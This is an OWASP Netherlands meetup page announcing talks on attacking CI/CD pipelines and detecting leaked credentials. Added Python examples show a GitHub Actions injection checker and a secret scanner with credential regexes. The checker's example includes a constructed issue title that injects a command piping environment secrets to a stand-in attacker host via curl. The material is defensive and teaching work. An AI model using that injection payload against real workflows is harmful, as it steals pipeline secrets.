
October 2023 OWASP Chapter Netherlands Meetup

Hosted by: OWASP Netherlands

Details

Location: Radboud University, Huygens building
Address: Heyendaalseweg 135, Nijmegen

See https://owasp.org/www-chapter-netherlands/upcomingevents for more information about the OWASP Netherlands chapter.

18:00 - 18:15 - Reception of attendees
18:15 - 19:00 - Pizza
19:00 - 19:15 - Welcome and OWASP updates
19:15 - 20:00 - Hacking CI/CD pipelines: a few considerations when attacking a CI/CD orchestrator by Mauricio Cano
20:00 - 20:15 - Break with drinks
20:15 - 21:00 - Unveiling the secrets in your code: Detecting and Triaging exposed credentials at scale by Ingmar Vis

Hacking CI/CD Pipelines: Some use cases for hacking CI/CD orchestrators
Abstract:
In this talk, we will discuss the hacking of CI/CD orchestrators, with a focus on GitHub Actions and what can be done from the perspective of a malicious insider. Some of the cases we will discuss are:
- Secret enumeration.
- Accessing infrastructure through runners.
- Public runners vs Private runners.
- Code injection in the pipeline and supply chain.
- Information exposed in GitHub commits.
- Secret searching in the repository.
The goal is to provide a broad view on the attack surface that can be derived from CI/CD orchestrators and their runners, as well as to show a few demos on how this can be done.
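The "code injection in the pipeline" case above has a concrete, well-known shape in GitHub Actions: a `${{ github.event.* }}` expression interpolated straight into a `run:` step is expanded textually by the runner before the shell ever sees the script, so an issue title or PR body chosen by an outside contributor becomes shell code executing with the job's token and secrets. The following is an added example written for this page, not the speaker's demo code: a small, line-based checker that flags untrusted contexts inside `run:` steps, a constructed vulnerable workflow beside its hardened form (the value is passed through `env:` so the shell only ever sees a variable), and a helper that mimics the runner's expansion so the effect of a constructed malicious title is visible. The list of untrusted contexts, the workflow texts and the attacker title are all assumptions made for the example.

```python
import re

# Event fields an outside contributor controls. Constructed list for this
# example (GitHub's hardening guide for Actions documents these and more).
UNTRUSTED_CONTEXTS = (
    "github.event.issue.title",
    "github.event.issue.body",
    "github.event.pull_request.title",
    "github.event.pull_request.body",
    "github.event.pull_request.head.ref",
    "github.event.pull_request.head.label",
    "github.event.comment.body",
    "github.event.review.body",
    "github.head_ref",
)

EXPRESSION = re.compile(r"\$\{\{\s*([^}]+?)\s*\}\}")
RUN_KEY = re.compile(r"^(\s*)(?:-\s+)?run:\s*(.*)$")


def run_steps(workflow_text):
    """Yield (line_no, script) for each `run:` key in the workflow.

    Block scalars (`run: |`) are collected by indentation. This is a
    deliberately minimal scanner, not a YAML parser.
    """
    lines = workflow_text.splitlines()
    i = 0
    while i < len(lines):
        m = RUN_KEY.match(lines[i])
        if not m:
            i += 1
            continue
        indent, rest = len(m.group(1)), m.group(2).strip()
        line_no = i + 1  # 1-based line of the `run:` key
        if rest in ("|", "|-", ">", ">-"):
            body, j = [], i + 1
            while j < len(lines) and (
                not lines[j].strip()
                or len(lines[j]) - len(lines[j].lstrip()) > indent
            ):
                body.append(lines[j].strip())
                j += 1
            yield line_no, "\n".join(body)
            i = j
        else:
            yield line_no, rest
            i += 1


def find_injections(workflow_text):
    """Return (line_no, context) for every untrusted expression that is
    interpolated directly into a shell step."""
    hits = []
    for line_no, script in run_steps(workflow_text):
        for ctx in EXPRESSION.findall(script):
            if any(ctx == u or ctx.startswith(u + ".") for u in UNTRUSTED_CONTEXTS):
                hits.append((line_no, ctx))
    return hits


def expand(script, values):
    """Mimic the runner: `${{ ctx }}` is replaced as text *before* the shell
    runs, which is why quoting inside the script does not protect you."""
    return EXPRESSION.sub(lambda m: values.get(m.group(1), ""), script)


# Constructed vulnerable workflow: untrusted title goes straight into bash.
VULNERABLE = """\
name: triage
on: issues
jobs:
  label:
    runs-on: ubuntu-latest
    steps:
      - run: |
          echo "New issue: ${{ github.event.issue.title }}"
"""

# Constructed hardened workflow: the expression is assigned to an
# environment variable; the shell only ever sees "$TITLE".
HARDENED = """\
name: triage
on: issues
jobs:
  label:
    runs-on: ubuntu-latest
    steps:
      - env:
          TITLE: ${{ github.event.issue.title }}
        run: |
          echo "New issue: $TITLE"
"""

# Constructed attacker-chosen issue title: closes the quote, runs a command,
# reopens the quote so the resulting line still parses.
EVIL_TITLE = '"; env | curl -s -d @- https://attacker.invalid/c; echo "'


if __name__ == "__main__":
    print("vulnerable:", find_injections(VULNERABLE))
    print("hardened:  ", find_injections(HARDENED))
    script = next(s for _, s in run_steps(VULNERABLE))
    print("what bash actually runs:\n ", expand(script, {"github.event.issue.title": EVIL_TITLE}))
```

The checker only knows the contexts it is told about; real tooling (actionlint, CodeQL's Actions queries) carries a fuller list and understands YAML properly, but the rule it enforces is the one shown: untrusted data goes through `env:` or an action input, never through string interpolation into `run:`.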

Bio:
Mauricio Cano is a cloud pentester focused on container technologies, in particular the security of containers and serverless architectures. He has pentested Kubernetes clusters and serverless architectures for several multinational financial institutions. Before moving into security he worked in academia and holds a Ph.D. in Computer Science from the University of Groningen, focused on programming language design and formal methods for ensuring correctness. In his spare time, Cano enjoys reading, cooking, and solving puzzles.

Unveiling the secrets in your code: Detecting and Triaging exposed credentials at scale
Abstract:
Security misconfigurations are often easy to exploit but also easy to avoid. How can we raise security awareness and at the same time prevent security misconfigurations (such as leaked credentials) from reaching production? Is there an easy way to scan, triage and follow up on exposed secrets at enterprise scale? ABN AMRO open-sourced Repository Scanner and runs it internally at scale, finding secrets in source code repositories and thereby raising security awareness while improving the security posture by remediating security misconfigurations.
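Both the "secret searching in the repository" case of the first talk and the scan-and-triage problem of the second come down to the same two steps: match candidate credentials, then decide which hits a human should actually look at. The following is an added example written for this page, not Repository Scanner's code or any part of ABN AMRO's process: a compact scanner with a few structured patterns, a generic assignment pattern backed by a Shannon-entropy check, and a triage step that separates placeholders and test fixtures from findings that need review. The patterns, the triage rules and the sample repository contents are all assumptions constructed for the example; the AWS-style key and GitHub-style token are made-up strings of the right shape, not real credentials.

```python
import math
import re

# Specific, structured formats first; the generic pattern last so a
# specific match claims the value before the generic one sees it.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "github_pat": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    "generic_assignment": re.compile(
        r"(?i)(?:password|passwd|secret|api[_-]?key|token)\s*[:=]\s*['\"]?"
        r"([A-Za-z0-9_\-/+=.]{8,})"
    ),
}

# Substrings that mark a value as a template or an indirection, not a secret.
PLACEHOLDERS = ("changeme", "example", "dummy", "placeholder", "xxx", "${", "<", "os.environ")

TEST_PATH = re.compile(r"(^|/)(tests?|fixtures?|examples?|docs?)/")


def shannon_entropy(value):
    """Bits per character; random API keys sit well above natural words."""
    n = len(value)
    return -sum(
        value.count(c) / n * math.log2(value.count(c) / n) for c in set(value)
    )


def triage(path, pattern, value):
    """Assign a triage class so the queue can be worked by priority."""
    low = value.lower()
    if any(p in low for p in PLACEHOLDERS):
        return "placeholder"
    if TEST_PATH.search(path) or path.endswith(".example"):
        return "test_fixture"
    if pattern == "generic_assignment" and shannon_entropy(value) < 3.0:
        return "low_entropy"
    return "review"


def scan_text(path, text):
    """Scan one file's content; returns one finding per (line, value)."""
    seen = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, rx in PATTERNS.items():
            for m in rx.finditer(line):
                value = m.group(1) if rx.groups else m.group(0)
                key = (lineno, value)
                if key in seen:
                    continue  # a more specific pattern already claimed it
                seen[key] = {
                    "path": path,
                    "line": lineno,
                    "pattern": name,
                    "value": value,
                    "triage": triage(path, name, value),
                }
    return list(seen.values())


def scan_files(files):
    """files: mapping of repository path -> content (e.g. from `git ls-files`)."""
    findings = []
    for path, text in files.items():
        findings.extend(scan_text(path, text))
    return findings


def summarize(findings):
    counts = {}
    for f in findings:
        counts[f["triage"]] = counts.get(f["triage"], 0) + 1
    return counts


# Constructed sample repository; none of these values are real credentials.
SAMPLE_FILES = {
    "config/prod.env": "AWS_ACCESS_KEY_ID=AKIAQ7ZT2M4V9XKC3PLB\nDB_PASSWORD=changeme\n",
    "src/deploy.py": 'token = "ghp_3kF9xQ2mLp7vR1sT8wB4nJ6yH0cD5eG2aZ9q"\napi_key = os.environ["API_KEY"]\n',
    "tests/fixtures/creds.yaml": 'password: "hunter2hunter2"\n',
}


if __name__ == "__main__":
    results = scan_files(SAMPLE_FILES)
    for f in results:
        print(f"{f['triage']:13} {f['path']}:{f['line']} {f['pattern']} {f['value']}")
    print(summarize(results))
```

At enterprise scale the interesting part is not the regexes but the triage: routing "review" findings to the owning team, auto-closing placeholders, and keeping the verdict so the same line is not re-raised on every scan. The entropy threshold of 3.0 bits is a starting point to tune against your own false-positive rate, not a constant to trust.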

Bio:
Ingmar Vis has been working in CI/CD for 7 years. In his current role, Ingmar acts as Product Owner for two teams at ABN AMRO: one delivers the Secure Coding capability for all developers, the other is responsible for the infrastructure and automation of the CI/CD tooling. Ingmar works on aspects such as Static Analysis, Software Composition Analysis, Container Security, and Secret Detection.

Faculty of Science
Heyendaalseweg 135 · Nijmegen, GE